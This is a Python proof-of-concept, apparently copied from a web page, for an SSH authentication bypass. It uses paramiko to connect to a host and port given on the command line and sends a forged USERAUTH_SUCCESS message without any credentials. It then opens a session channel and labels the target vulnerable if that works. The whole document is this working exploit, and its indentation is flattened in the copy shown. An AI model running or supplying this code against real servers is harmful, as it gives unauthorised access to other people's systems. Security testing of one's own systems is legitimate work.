#!/usr/bin/env python
# coding: utf-8
import paramiko
import socket
import sys
def poc(hostname="127.0.0.1", port=22):
paramiko.util.log_to_file("poc.log")
sock = socket.socket()
sock.settimeout(1)
try:
sock.connect((hostname, port))
# instantiate transport
m = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(m)
cmd_channel = transport.open_session(timeout=1)
except socket.error as e:
print("%s %d connection failed: %s" % (hostname, port, e.message))
return 254
except Exception as e:
print("%s %d probably not vulnerable: %s" % (hostname, port, e.message))
return 1
print("%s %d vulnerable" % (hostname, port))
return 0
if __name__ == "__main__":
exit(poc(sys.argv[1], int(sys.argv[2])))
Comments